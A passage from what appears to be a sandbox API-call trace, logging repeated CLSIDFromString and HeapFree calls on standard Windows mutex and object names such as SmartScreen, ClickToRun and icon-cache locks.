[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.660] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.660] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_48.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.660] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.660] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_32.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.660] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.660] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_idx.db!rwWriterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.661] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.661] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_wide_alternate.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.661] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.661] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:iconcache_idx.db!IconCacheInit", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.661] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.661] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.661] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.661] CLSIDFromString (in: lpsz="C::Users:RDhJ0CNFevzX:AppData:Local:Microsoft:Windows:Explorer:thumbcache_exif.db!dfMaintainer", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.661] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.662] CLSIDFromString (in: lpsz="SessionImmersiveColorMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.662] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.663] CLSIDFromString (in: lpsz="DBWinMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.663] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.665] CLSIDFromString (in: lpsz="SessionImmersiveColorMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.665] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.666] CLSIDFromString (in: lpsz="DBWinMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.666] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.667] CLSIDFromString (in: lpsz="!IECompat!Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.667] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.668] CLSIDFromString (in: lpsz="SessionImmersiveColorMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.668] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.668] CLSIDFromString (in: lpsz="ZonesCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.668] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.669] CLSIDFromString (in: lpsz="ZonesLockedCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.669] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.669] CLSIDFromString (in: lpsz="!BrowserEmulation!SharedMemory!Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.670] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.670] CLSIDFromString (in: lpsz="LowInternetExplorerDOMStoreQuota", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.670] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.670] CLSIDFromString (in: lpsz="Lowhttps://www.bing.com/", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.670] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.670] CLSIDFromString (in: lpsz="MSCTF.Asm.MutexDefault1S-1-5-21-1560258661-3990802383-1811730007-1000", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.670] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.672] CLSIDFromString (in: lpsz="!IECompat!Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.673] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.673] CLSIDFromString (in: lpsz="ZonesCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.673] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.673] CLSIDFromString (in: lpsz="ZonesLockedCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.673] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.675] CLSIDFromString (in: lpsz="ClickToRun_System_SingleInstance_16", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.675] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.675] CLSIDFromString (in: lpsz="ClickToRun_ResumeScenario", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.676] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.676] CLSIDFromString (in: lpsz="ClickToRun_Pipeline16", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.676] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.676] CLSIDFromString (in: lpsz="ClickToRun_ExecutionContext", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.676] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.677] CLSIDFromString (in: lpsz="ZonesCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.677] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.677] CLSIDFromString (in: lpsz="ZonesLockedCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.677] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.682] CLSIDFromString (in: lpsz="CicLoadWinStaWinSta0", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.682] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.682] CLSIDFromString (in: lpsz="MSCTF.CtfMonitorInstMutexDefault1", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.683] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.683] CLSIDFromString (in: lpsz="MSCTF.Asm.MutexDefault1S-1-5-21-1560258661-3990802383-1811730007-1000", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.683] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.683] CLSIDFromString (in: lpsz="SessionImmersiveColorMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.683] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.683] CLSIDFromString (in: lpsz="AccessibilitySoundAgentRunning", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.683] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.684] CLSIDFromString (in: lpsz="DBWinMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.685] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.686] CLSIDFromString (in: lpsz="ADAP_WMI_ENTRY", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.686] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.686] CLSIDFromString (in: lpsz="RefreshRA_Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.686] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.686] CLSIDFromString (in: lpsz="RefreshRA_Mutex_Lib", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.687] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.687] CLSIDFromString (in: lpsz="RefreshRA_Mutex_Flag", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.687] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.688] CLSIDFromString (in: lpsz="CallsApp.ContactsIndexManager.IndexLock", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.688] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.689] CLSIDFromString (in: lpsz="SmartScreen_ClientId_Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.689] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.689] CLSIDFromString (in: lpsz="SmartScreen_AppRepSettings_Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.690] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.690] CLSIDFromString (in: lpsz="CommunicationManager_Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.690] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.690] CLSIDFromString (in: lpsz="!BrowserEmulation!SharedMemory!Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.690] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.691] CLSIDFromString (in: lpsz="VERMGMTBlockListFileMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.691] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.691] CLSIDFromString (in: lpsz="SessionImmersiveColorMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.691] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.691] CLSIDFromString (in: lpsz="{5312EE61-79E3-4A24-BFE1-132B85B23C3A}", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x5312ee61, Data2=0x79e3, Data3=0x4a24, Data4=([0]=0xbf, [1]=0xe1, [2]=0x13, [3]=0x2b, [4]=0x85, [5]=0xb2, [6]=0x3c, [7]=0x3a))) returned 0x0 [0114.691] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.691] CLSIDFromString (in: lpsz="ZonesCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.692] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.692] CLSIDFromString (in: lpsz="ZonesLockedCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.692] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.692] CLSIDFromString (in: lpsz="{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x66d0969a, Data2=0x1e86, Data3=0x44cf, Data4=([0]=0xb4, [1]=0xec, [2]=0x38, [3]=0x6, [4]=0xdd, [5]=0xda, [6]=0x3b, [7]=0x5d))) returned 0x0 [0114.692] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.693] CLSIDFromString (in: lpsz="TraceLogStorageMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.693] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.709] CLSIDFromString (in: lpsz="SessionImmersiveColorMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.709] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.710] CLSIDFromString (in: lpsz="SessionImmersiveColorMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.710] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.710] CLSIDFromString (in: lpsz="SessionImmersiveColorMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.710] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.711] CLSIDFromString (in: lpsz="VERMGMTBlockListFileMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.711] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.712] CLSIDFromString (in: lpsz="SmartScreen_AppRepSettings_Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.712] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.712] CLSIDFromString (in: lpsz="SmartScreen_ClientId_Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.712] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.712] CLSIDFromString (in: lpsz="CommunicationManager_Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.712] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.712] CLSIDFromString (in: lpsz="ZonesCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.712] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.712] CLSIDFromString (in: lpsz="ZonesLockedCacheCounterMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.712] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.713] CLSIDFromString (in: lpsz="!BrowserEmulation!SharedMemory!Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.713] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.713] CLSIDFromString (in: lpsz="MSCTF.Asm.MutexDefault1S-1-5-21-1560258661-3990802383-1811730007-1000", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.713] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.715] CLSIDFromString (in: lpsz="System_Feed_Scheduler_Mutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, 